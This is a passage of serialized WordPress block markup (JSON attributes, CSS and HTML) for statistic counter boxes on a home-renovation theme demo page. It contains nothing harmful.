{\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"7763ad54-c1cc-4f65-87d7-1c2467612e7f\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-7763ad54-c1cc-4f65-87d7-1c2467612e7f skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">499</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Home Renovation</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"4b24daa2-96c4-4eee-b9d4-6d780518f21a\"} -->\n<style type=\"text/css\"> .block-4b24daa2-96c4-4eee-b9d4-6d780518f21a .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-4b24daa2-96c4-4eee-b9d4-6d780518f21a .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-4b24daa2-96c4-4eee-b9d4-6d780518f21a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-4b24daa2-96c4-4eee-b9d4-6d780518f21a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-4b24daa2-96c4-4eee-b9d4-6d780518f21a .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-4b24daa2-96c4-4eee-b9d4-6d780518f21a\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":23,\"title\":\"project-img1\",\"filename\":\"project-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:35.000Z\",\"modified\":\"2021-05-25T13:48:35.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"5c79f897-df50-4b94-a7b6-bd978675eb31\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-5c79f897-df50-4b94-a7b6-bd978675eb31 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">3541</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Project Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"1e9b3b34-822d-44f1-8727-46320a6bc479\"} -->\n<style type=\"text/css\"> .block-1e9b3b34-822d-44f1-8727-46320a6bc479 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-1e9b3b34-822d-44f1-8727-46320a6bc479 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-1e9b3b34-822d-44f1-8727-46320a6bc479 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-1e9b3b34-822d-44f1-8727-46320a6bc479 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-1e9b3b34-822d-44f1-8727-46320a6bc479 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-1e9b3b34-822d-44f1-8727-46320a6bc479\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-86b9f2aa-b6cd-4950-9cb8-919e1de4d6ca skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"95c0e54f-01b3-4b36-831f-1ac481c6ea4e\"} -->\n<style type=\"text/css\"> .block-95c0e54f-01b3-4b36-831f-1ac481c6ea4e .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-95c0e54f-01b3-4b36-831f-1ac481c6ea4e .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-95c0e54f-01b3-4b36-831f-1ac481c6ea4e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-95c0e54f-01b3-4b36-831f-1ac481c6ea4e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-95c0e54f-01b3-4b36-831f-1ac481c6ea4e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-95c0e54f-01b3-4b36-831f-1ac481c6ea4e\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"ef45fcde-982c-4313-909b-e20332b97d17\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-ef45fcde-982c-4313-909b-e20332b97d17.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 